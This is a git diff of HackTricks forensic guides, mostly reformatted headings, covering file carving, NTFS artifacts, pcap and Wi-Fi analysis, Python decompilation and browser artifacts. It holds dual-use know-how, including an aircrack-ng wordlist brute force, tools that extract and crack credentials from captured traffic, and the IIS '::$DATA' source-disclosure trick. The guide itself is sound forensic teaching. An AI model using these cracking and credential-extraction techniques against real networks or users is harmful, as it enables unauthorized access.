You can use [**viu** ](https://github.com/atanunq/viu)to see images form the terminal.\
You can use the linux command line tool **pdftotext** to transform a pdf into text and read it.
diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md
index 57eef632..4ad66a0d 100644
--- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md
+++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md
@@ -17,15 +17,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# File/Data Carving Tools
+# Carving tools
-## Carving tools
-
-### Autopsy
+## Autopsy
The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kind of images, but not simple files.
-### Binwalk
+## Binwalk
**Binwalk** is a tool for searching binary files like images and audio files for embedded files and data.
It can be installed with `apt` however the [source](https://github.com/ReFirmLabs/binwalk) can be found on github.
@@ -38,7 +36,7 @@ binwalk -e file #Displays and extracts some files from the given file
binwalk --dd ".*" file #Displays and extracts all files from the given file
```
-### Foremost
+## Foremost
Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for it's default configured file types.
@@ -48,7 +46,7 @@ foremost -v -i file.img -o output
#Discovered files will appear inside the folder "output"
```
-### **Scalpel**
+## **Scalpel**
**Scalpel** is another tool that can be use to find and extract **files embedded in a file**. In this case you will need to uncomment from the configuration file \(_/etc/scalpel/scalpel.conf_\) the file types you want it to extract.
@@ -57,7 +55,7 @@ sudo apt-get install scalpel
scalpel file.img -o output
```
-### Bulk Extractor
+## Bulk Extractor
This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor)
@@ -69,7 +67,7 @@ bulk_extractor memory.img -o out_folder
Navigate through **all the information** that the tool has gathered \(passwords?\), **analyse** the **packets** \(read[ **Pcaps analysis**](../pcap-inspection/)\), search for **weird domains** \(domains related to **malware** or **non-existent**\).
-### PhotoRec
+## PhotoRec
You can find it in [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download)
@@ -77,15 +75,15 @@ It comes with GUI and CLI version. You can select the **file-types** you want Ph
-## Specific Data Carving Tools
+# Specific Data Carving Tools
-### FindAES
+## FindAES
Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker.
Download [here](https://sourceforge.net/projects/findaes/).
-## Complementary tools
+# Complementary tools
You can use [**viu** ](https://github.com/atanunq/viu)to see images form the terminal.
You can use the linux command line tool **pdftotext** to transform a pdf into text and read it.
diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md
index 85bb83c7..00252bd9 100644
--- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md
+++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md
@@ -16,9 +16,8 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## NTFS
-### **NTFS**
+# **NTFS**
**NTFS** (**New Technology File System**) is a proprietary journaling file system developed by Microsoft.
@@ -35,17 +34,17 @@ The cluster is the minimum size unit of NTFS and the size of the cluster depends
| 16,385MB-32,768MB (32GB) | 64 | 32KB |
| Greater than 32,768MB | 128 | 64KB |
-#### **Slack-Space**
+## **Slack-Space**
As the **minimum** size unit of NTFS is a **cluster**. Each file will be occupying a number of complete clusters. Then, it's highly probable that **each file occupies more space than necessary**. These **unused** **spaces** **booked** by a file which is called **slacking** **space**. And people could take advantage of this technique to **hide** **information**.
.png>)
-#### **NTFS boot sector**
+## **NTFS boot sector**
When you format an NTFS volume, the format program allocates the first 16 sectors for the $Boot metadata file. First sector, in fact, is a boot sector with a "bootstrap" code and the following 15 sectors are the boot sector's IPL (initial program loader). To increase file system reliability the very last sector an NTFS partition contains a spare copy of the boot sector.
-#### **Master File Table o $MFT**
+## **Master File Table o $MFT**
The NTFS file system contains a file called the _master file table_, or MFT. There is at least **one entry in the MFT for every file on an NTFS file system** volume, including the MFT itself. All information about a file, including its **size, time and date stamps, permissions, and data content**, is stored either in MFT entries, or in space outside the MFT that is described by MFT entries.
@@ -78,7 +77,7 @@ NTFS reserves the first 16 records of the table for special information:
| Object Id file | $ObjId | 25 | Contains file object IDs. |
| Reparse point file | $Reparse | 26 | This file contains information about files and folders on the volume include reparse point data. |
-#### Each entry of the MFT looks like the following:
+## Each entry of the MFT looks like the following:
.png>)
@@ -98,7 +97,7 @@ It's also possible to recover deleted files using FTKImager:
.png>)
-#### MFT Attributes
+## MFT Attributes
Each MFT entry has several attributes as the following image indicates:
@@ -156,7 +155,7 @@ Some interesting attributes:
.png>)
-#### NTFS timestamps
+## NTFS timestamps
.png>)
@@ -165,7 +164,7 @@ This program will extract all the MFT data and present it in CSV format. It can
.png>)
-#### $LOGFILE
+## $LOGFILE
The file **`$LOGFILE`** contains **logs** about the **actions** that have been **performed** **to** **files**. It also **saves** the **action** it would need to perform in case of a **redo** and the action needed to **go back** to the **previous** **state**.\
These logs are useful for the MFT to rebuild the file system in case some kind of error happened.
@@ -181,7 +180,7 @@ Filtering by filenames you can see **all the actions performed against a file**:
.png>)
-#### $USNJnrl
+## $USNJnrl
The file `$EXTEND/$USNJnrl/$J` is and alternate data stream of the file `$EXTEND$USNJnrl` . This artifact contains a **registry of changes produced inside the NTFS volume with more detail than `$LOGFILE`**.
@@ -191,7 +190,7 @@ Filtering by the filename it's possible to see **all the actions performed again
.png>)
-#### $I30
+## $I30
Every **directory** in the file system contains an **`$I30`** **attribute** that must be maintained whenever there are changes to the directory's contents. When files or folders are removed from the directory, the **`$I30`** index records are re-arranged accordingly. However, **re-arranging of the index records may leave remnants of the deleted file/folder entry within the slack space**. This can be useful in forensics analysis for identifying files that may have existed on the drive.
@@ -201,13 +200,13 @@ You can get the `$I30` file of a directory from the **FTK Imager** and inspect i
With this data you can find **information about the file changes performed inside the folder** but note that the deletion time of a file isn't saved inside this logs. However, you can see that **last modified date** of the **`$I30` file**, and if the **last action performed** over the directory is the **deletion** of a file, the times may be the same.
-#### $Bitmap
+## $Bitmap
The **`$BitMap`** is a special file within the NTFS file system. This file keeps **track of all of the used and unused clusters** on an NTFS volume. When a file takes up space on the NTFS volume the location is uses is marked out in the `$BitMap`.
.png>)
-#### ADS (Alternate Data Stream)
+## ADS (Alternate Data Stream)
Alternate data streams allow files to contain more than one stream of data. Every file has at least one data stream. In Windows, this default data stream is called `:$DATA`.\
In this [page you can see different ways to create/access/discover alternate data streams](../../../windows/basic-cmd-for-pentesters.md#alternate-data-streams-cheatsheet-ads-alternate-data-stream) from the console. In the past this cause a vulnerability in IIS as people was able to access the source code of a page by accessing the `:$DATA` stream like `http://www.alternate-data-streams.com/default.asp::$DATA`.
diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md
index e574f15d..76f83dc5 100644
--- a/forensics/basic-forensic-methodology/pcap-inspection/README.md
+++ b/forensics/basic-forensic-methodology/pcap-inspection/README.md
@@ -16,23 +16,22 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## Pcap Inspection
{% hint style="info" %}
A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file format; **PCAPNG is newer and not supported by all tools**. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools.
{% endhint %}
-### Online tools for pcaps
+# Online tools for pcaps
* If the header of your pcap is **broken** you should try to **fix** it using: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
* Extract **information** and search for **malware** inside a pcap in [**PacketTotal**](https://packettotal.com)
* Search for **malicious activity** using [**www.virustotal.com**](https://www.virustotal.com) and [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com)
-### Extract Information
+# Extract Information
The following tools are useful to extract statistic, files...
-#### Wireshark
+## Wireshark
{% hint style="info" %}
**If you are going to analyze a PCAP you basically must to know how to use Wireshark**
@@ -44,7 +43,7 @@ You can find some Wireshark trick in:
[wireshark-tricks.md](wireshark-tricks.md)
{% endcontent-ref %}
-#### Xplico Framework
+## Xplico Framework
[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on.
@@ -68,19 +67,19 @@ Access to _**127.0.0.1:9876**_ with credentials _**xplico:xplico**_
Then create a **new case**, create a **new session** inside the case and **upload the pcap** file.
-#### NetworkMiner
+## NetworkMiner
Like Xplico it is a tool to **analyze and extract objects from pcaps**. It has a free edition that you can **download** [**here**](https://www.netresec.com/?page=NetworkMiner). It works with **Windows**.\
This tool is also useful to get **other information analysed** from the packets in order to be able to know what was happening there in a **quick** way.
-#### NetWitness Investigator
+## NetWitness Investigator
You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(It works in Windows)**.\
This is another useful tool that **analyse the packets** and sort the information in a useful way to **know what is happening inside**.
 (1).png>)
-#### [BruteShark](https://github.com/odedshimon/BruteShark)
+## [BruteShark](https://github.com/odedshimon/BruteShark)
* Extracting and encoding usernames and passwords (HTTP, FTP, Telnet, IMAP, SMTP...)
* Extract authentication hashes and crack them using Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
@@ -89,13 +88,13 @@ This is another useful tool that **analyse the packets** and sort the informatio
* Reconstruct all TCP & UDP Sessions
* File Carving
-#### Capinfos
+## Capinfos
```
capinfos capture.pcap
```
-#### Ngrep
+## Ngrep
If you are **looking** for **something** inside the pcap you can use **ngrep**. And example using the main filters:
@@ -103,7 +102,7 @@ If you are **looking** for **something** inside the pcap you can use **ngrep**.
ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168"
```
-#### Carving
+## Carving
Using common carving techniques can be useful to extract files and information from the pcap:
@@ -111,13 +110,13 @@ Using common carving techniques can be useful to extract files and information f
[file-data-carving-recovery-tools.md](../partitions-file-systems-carving/file-data-carving-recovery-tools.md)
{% endcontent-ref %}
-#### Capturing credentials
+## Capturing credentials
You can us tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface.
-### Check Exploits/Malware
+# Check Exploits/Malware
-#### Suricata
+## Suricata
**Install and setup**
@@ -134,7 +133,7 @@ oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules
suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
```
-#### YaraPcap
+## YaraPcap
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that
@@ -144,7 +143,7 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
* writes a report.txt
* optionally saves matching files to a Dir
-#### Malware Analysis
+## Malware Analysis
Check if you can find any fingerprint of a known malware:
@@ -152,13 +151,13 @@ Check if you can find any fingerprint of a known malware:
[malware-analysis.md](../malware-analysis.md)
{% endcontent-ref %}
-### Zeek
+# Zeek
> Zeek is a passive, open-source network traffic analyzer. Many operators use Zeek as a network security monitor (NSM) to support investigations of suspicious or malicious activity. Zeek also supports a wide range of traffic analysis tasks beyond the security domain, including performance measurement and troubleshooting.
Basically, logs created by `zeek` aren't **pcaps**. Therefore you will need to use **other tools** to analyse the logs where the **information** about the pcaps are.
-#### Connections Info
+## Connections Info
```bash
#Get info about longest connections (add "grep udp" to see only udp traffic)
@@ -191,7 +190,7 @@ cat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p proto service | grep '1.1.
cat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p proto | awk 'BEGIN{ FS="\t" } { arr[$1 FS $2 FS $3 FS $4] += 1 } END{ for (key in arr) printf "%s%s%s\n", key, FS, arr[key] }' | sort -nrk 5 | head -n 10
-### RITA
+# RITA
#Something similar can be done with the tool rita
rita show-long-connections -H --limit 10 zeek_logs
@@ -210,7 +209,7 @@ Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top
0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0
```
-#### DNS info
+## DNS info
```bash
#Get info about each DNS request performed
@@ -229,7 +228,7 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr
rita show-exploded-dns -H --limit 10 zeek_logs
```
-### Other pcap analysis tricks
+# Other pcap analysis tricks
{% content-ref url="dnscat-exfiltration.md" %}
[dnscat-exfiltration.md](dnscat-exfiltration.md)
diff --git a/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md b/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
index 7321c0d5..c4788db3 100644
--- a/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
+++ b/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# DNSCat pcap analysis
-
If you have pcap with data being **exfiltrated by DNSCat** (without using encryption), you can find the exfiltrated content.
You only need to know that the **first 9 bytes** are not real data but are related to the **C\&C communication**:
diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md
index 35064b85..74f380b6 100644
--- a/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md
+++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# USB Keyboard pcap analysis
-
If you have a pcap of a USB connection with a lot of Interruptions probably it is a USB Keyboard connection.
A wireshark filter like this could be useful: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)`
diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
index 21f20be6..d48dd09d 100644
--- a/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
+++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# USB Keystrokes
-
If you have a pcap containing the communication via USB of a keyboard like the following one:
.png>)
diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
index 1b69a965..8f00a519 100644
--- a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
+++ b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Wifi Pcap Analysis
-
-## Check BSSIDs
+# Check BSSIDs
When you receive a capture whose principal traffic is Wifi using WireShark you can start investigating all the SSIDs of the capture with _Wireless --> WLAN Traffic_:
@@ -27,7 +25,7 @@ When you receive a capture whose principal traffic is Wifi using WireShark you c
.png>)
-### Brute Force
+## Brute Force
One of the columns of that screen indicates if **any authentication was found inside the pcap**. If that is the case you can try to Brute force it using `aircrack-ng`:
@@ -35,11 +33,11 @@ One of the columns of that screen indicates if **any authentication was found in
aircrack-ng -w pwds-file.txt -b file.pcap
```
-## Data in Beacons / Side Channel
+# Data in Beacons / Side Channel
If you suspect that **data is being leaked inside beacons of a Wifi network** you can check the beacons of the network using a filter like the following one: `wlan contains `, or `wlan.ssid == "NAMEofNETWORK"` search inside the filtered packets for suspicious strings.
-## Find unknown MAC addresses in a Wiffi network
+# Find unknown MAC addresses in a Wiffi network
The following link will be useful to find the **machines sending data inside a Wifi Network**:
@@ -49,7 +47,7 @@ If you already know **MAC addresses you can remove them from the output** adding
Once you have detected **unknown MAC** addresses communicating inside the network you can use **filters** like the following one: `wlan.addr== && (ftp || http || ssh || telnet)` to filter its traffic. Note that ftp/http/ssh/telnet filters are useful if you have decrypted the traffic.
-## Decrypt Traffic
+# Decrypt Traffic
Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit
diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
index dcbc8014..db62c6d9 100644
--- a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
+++ b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
@@ -16,11 +16,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## Wireshark tricks
-### Improve your Wireshark skills
+# Improve your Wireshark skills
-#### Tutorials
+## Tutorials
The following tutorials are amazing to learn some cool basic tricks:
@@ -29,7 +28,7 @@ The following tutorials are amazing to learn some cool basic tricks:
* [https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/](https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/)
* [https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/](https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/)
-#### Analysed Information
+## Analysed Information
**Expert Information**
@@ -74,7 +73,7 @@ Under _**Statistics --> I/O Graph**_ you can find a **graph of the communication
.png>)
-#### Filters
+## Filters
Here you can find wireshark filter depending on the protocol: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
Other interesting filters:
@@ -86,14 +85,14 @@ Other interesting filters:
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)`
* HTTP and initial HTTPS traffic + TCP SYN + DNS requests
-#### Search
+## Search
If you want to **search** for **content** inside the **packets** of the sessions press _CTRL+f_\
\_\_You can add new layers to the main information bar _(No., Time, Source...)_ pressing _right bottom_ and _Edit Column_
Practice: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)
-### Identifying Domains
+# Identifying Domains
You can add a column that show the Host HTTP header:
@@ -103,21 +102,21 @@ And a column that add the Server name from an initiating HTTPS connection (**ssl
.png>)
-### Identifying local hostnames
+# Identifying local hostnames
-#### From DHCP
+## From DHCP
In current Wireshark instead of `bootp` you need to search for `DHCP`
.png>)
-#### From NBNS
+## From NBNS
.png>)
-### Decrypting TLS
+# Decrypting TLS
-#### Decrypting https traffic with server private key
+## Decrypting https traffic with server private key
_edit>preference>protocol>ssl>_
@@ -125,7 +124,7 @@ _edit>preference>protocol>ssl>_
Press _Edit_ and add all the data of the server and the private key (_IP, Port, Protocol, Key file and password_)
-#### Decrypting https traffic with symmetric session keys
+## Decrypting https traffic with symmetric session keys
It turns out that Firefox and Chrome both support logging the symmetric session key used to encrypt TLS traffic to a file. You can then point Wireshark at said file and presto! decrypted TLS traffic. More in: [https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/)\
To detect this search inside the environment for to variable `SSLKEYLOGFILE`
@@ -138,7 +137,7 @@ To import this in wireshark go to _edit>preference>protocol>ssl>_ and import it
.png>)
-### ADB communication
+# ADB communication
Extract an APK from an ADB communication where the APK was sent:
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
index 51c5ebd8..6812c413 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Decompile compiled python binaries (exe, elf) - Retreive from .pyc
-
-## From Compiled Binary to .pyc
+# From Compiled Binary to .pyc
From an **ELF** compiled binary you can **get the .pyc** with:
@@ -48,7 +46,7 @@ In an **python exe binary** compiled you can **get the .pyc** by running:
python pyinstxtractor.py executable.exe
```
-## From .pyc to python code
+# From .pyc to python code
For the **.pyc** data ("compiled" python) you should start trying to **extract** the **original** **python** **code**:
@@ -60,7 +58,7 @@ uncompyle6 binary.pyc > decompiled.py
While executing **uncompyle6** you might find the **following errors**:
-### Error: Unknown magic number 227
+## Error: Unknown magic number 227
```bash
/kali/.local/bin/uncompyle6 /tmp/binary.pyc
@@ -91,7 +89,7 @@ hexdump 'binary.pyc' | head
0000030 0164 006c 005a 0064 0164 016c 015a 0064
```
-### Error: Decompiling generic errors
+## Error: Decompiling generic errors
**Other errors** like: `class 'AssertionError'>; co_code should be one of the types (, , , ); is type ` may appear.
@@ -99,13 +97,13 @@ This probably means that you **haven't added correctly** the magic number or tha
Check the previous error documentation.
-## Automatic Tool
+# Automatic Tool
The tool [https://github.com/countercept/python-exe-unpacker](https://github.com/countercept/python-exe-unpacker) glues together several tools available to the community that **helps researcher to unpack and decompile executable** written in python (py2exe and pyinstaller).
Several YARA rules are available to determine if the executable is written in python (This script also confirms if the executable is created with either py2exe or pyinstaller).
-### ImportError: File name: 'unpacked/malware\_3.exe/**pycache**/archive.cpython-35.pyc' doesn't exist
+## ImportError: File name: 'unpacked/malware\_3.exe/**pycache**/archive.cpython-35.pyc' doesn't exist
Currently with unpy2exe or pyinstxtractor the Python bytecode file we get might not be complete and in turn it **can’t be recognized by uncompyle6 to get the plain Python source code**. This is caused by a missing Python **bytecode version number**. Therefore we included a prepend option; this will include a Python bytecode version number into it and help to ease the process of decompiling. When we try to use uncompyle6 to decompile the .pyc file it returns an error. However, **once we use the prepend option we can see that the Python source code has been decompiled successfully**.
@@ -125,7 +123,7 @@ test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive
[+] Successfully decompiled.
```
-## Analyzing python assembly
+# Analyzing python assembly
If you weren't able to extract the python "original" code following the previous steps, then you can try to **extract** the **assembly** (but i**t isn't very descriptive**, so **try** to extract **again** the original code).In [here](https://bits.theorem.co/protecting-a-python-codebase/) I found a very simple code to **dissasemble** the _.pyc_ binary (good luck understanding the code flow). If the _.pyc_ is from python2, use python2:
@@ -172,11 +170,11 @@ True
17 RETURN_VALUE
```
-## Python to Executable
+# Python to Executable
To start off we’re going to show you how payloads can be compiled in py2exe and PyInstaller.
-### To create a payload using py2exe:
+## To create a payload using py2exe:
1. Install the py2exe package from [http://www.py2exe.org/](http://www.py2exe.org)
2. For the payload (in this case, we will name it hello.py), use a script like the one in Figure 1. The option “bundle\_files” with the value of 1 will bundle everything including Python interpreter into one exe.
@@ -210,7 +208,7 @@ copying C:\Python27\lib\site-packages\py2exe\run.exe -> C:\Users\test\Desktop\te
Adding python27.dll as resource to C:\Users\test\Desktop\test\dist\hello.exe
```
-### To create a payload using PyInstaller:
+## To create a payload using PyInstaller:
1. Install PyInstaller using pip (pip install pyinstaller).
2. After that, we will issue the command “pyinstaller –onefile hello.py” (a reminder that ‘hello.py’ is our payload). This will bundle everything into one executable.
@@ -228,7 +226,7 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
6325 INFO: Building EXE from out00-EXE.toc completed successfully.
```
-## References
+# References
* [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/)
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md
index 411bd20d..3c0db1da 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Specific Software/File-Type Tricks
-
Here you can find interesting tricks for specific file-types and/or software:
{% page-ref page=".pyc.md" %}
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
index be134686..ef7b9631 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Browser Artifacts
-
-## Browsers Artefacts
+# Browsers Artefacts
When we talk about browser artefacts we talk about, navigation history, bookmarks, list of downloaded files, cache data…etc.
@@ -41,7 +39,7 @@ Let us take a look at the most common artefacts stored by browsers.
* **Form Data :** Anything typed inside forms is often times stored by the browser, so the next time the user enters something inside of a form the browser can suggest previously entered data.
* **Thumbnails :** Self Explanatory.
-## Firefox
+# Firefox
Firefox use to create the profiles folder in \~/_**.mozilla/firefox/**_ (Linux), in **/Users/$USER/Library/Application Support/Firefox/Profiles/** (MacOS), _**%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\\**_ (Windows)_**.**_\
Inside this folder, the file _**profiles.ini**_ should appear with the name(s) of the used profile(s).\
@@ -100,7 +98,7 @@ done < $passfile
.png>)
-## Google Chrome
+# Google Chrome
Google Chrome creates the profile inside the home of the user _**\~/.config/google-chrome/**_ (Linux), in _**C:\Users\XXX\AppData\Local\Google\Chrome\User Data\\**_ (Windows), or in _**/Users/$USER/Library/Application Support/Google/Chrome/** _ (MacOS).\
Most of the information will be saved inside the _**Default/**_ or _**ChromeDefaultData/**_ folders inside the paths indicated before. Inside here you can find the following interesting files:
@@ -127,11 +125,11 @@ Most of the information will be saved inside the _**Default/**_ or _**ChromeDefa
* **Browser’s built-in anti-phishing:** `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`
* You can simply grep for “**safebrowsing**” and look for `{"enabled: true,"}` in the result to indicate anti-phishing and malware protection is on.
-## **SQLite DB Data Recovery**
+# **SQLite DB Data Recovery**
As you can observe in the previous sections, both Chrome and Firefox use **SQLite** databases to store the data. It's possible to **recover deleted entries using the tool** [**sqlparse**](https://github.com/padfoot999/sqlparse) **or** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases).
-## **Internet Explorer 11**
+# **Internet Explorer 11**
Internet Explorer stores **data** and **metadata** in different locations. The metadata will allow to find the data.
@@ -147,11 +145,11 @@ Inside this table you can find in which other tables or containers each part of
**Note that this table indicate also metadadata of the cache of other Microsoft tools also (e.g. skype)**
-### Cache
+## Cache
You can use the tool [IECacheView](https://www.nirsoft.net/utils/ie\_cache\_viewer.html) to inspect the cache. You need to indicate the folder where you have extracted the cache date.
-#### Metadata
+### Metadata
The metadata information about the cache stores:
@@ -164,17 +162,17 @@ The metadata information about the cache stores:
* ModifiedTime: Last webpage version
* ExpiryTime: Time when the cache will expire
-#### Files
+### Files
The cache information can be found in _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5**_ and _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\low**_
The information inside these folders is a **snapshot of what the user was seeing**. The caches has a size of **250 MB** and the timestamps indicate when the page was visited (first time, creation date of the NTFS, last time, modification time of the NTFS).
-### Cookies
+## Cookies
You can use the tool [IECookiesView](https://www.nirsoft.net/utils/iecookies.html) to inspect the cookies. You need to indicate the folder where you have extracted the cookies.
-#### **Metadata**
+### **Metadata**
The metadata information about the cookies stores:
@@ -186,15 +184,15 @@ The metadata information about the cookies stores:
* AccessedTime: Last time the cookie was accesed
* ExpiryTime: Time of expiration of the cookie
-#### Files
+### Files
The cookies data can be found in _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies**_ and _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies\low**_
Session cookies will reside in memory and persistent cookie in the disk.
-### Downloads
+## Downloads
-#### **Metadata**
+### **Metadata**
Checking the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) you can find the container with the metadata of the downloads:
@@ -202,25 +200,25 @@ Checking the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\
Getting the information of the column "ResponseHeaders" you can transform from hex that information and obtain the URL, the file type and the location of the downloaded file.
-#### Files
+### Files
Look in the path _**%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory**_
-### **History**
+## **History**
The tool [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing\_history\_view.html) can be used to read the history. But first you need to indicate the browser in advanced options and the location of the extracted history files.
-#### **Metadata**
+### **Metadata**
* ModifiedTime: First time a URL is found
* AccessedTime: Last time
* AccessCount: Number of times accessed
-#### **Files**
+### **Files**
Search in _**userprofile%\Appdata\Local\Microsoft\Windows\History\History.IE5**_ and _**userprofile%\Appdata\Local\Microsoft\Windows\History\Low\History.IE5**_
-### **Typed URLs**
+## **Typed URLs**
This information can be found inside the registry NTDUSER.DAT in the path:
@@ -229,7 +227,7 @@ This information can be found inside the registry NTDUSER.DAT in the path:
* _**Software\Microsoft\InternetExplorer\TypedURLsTime**_
* last time the URL was typed
-## Microsoft Edge
+# Microsoft Edge
For analyzing Microsoft Edge artifacts all the **explanations about cache and locations from the previous section (IE 11) remain valid** with the only difference that the base locating in this case is _**%userprofile%\Appdata\Local\Packages**_ (as can be observed in the following paths):
@@ -239,7 +237,7 @@ For analyzing Microsoft Edge artifacts all the **explanations about cache and lo
* Cache: _**C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC#!XXX\MicrosoftEdge\Cache**_
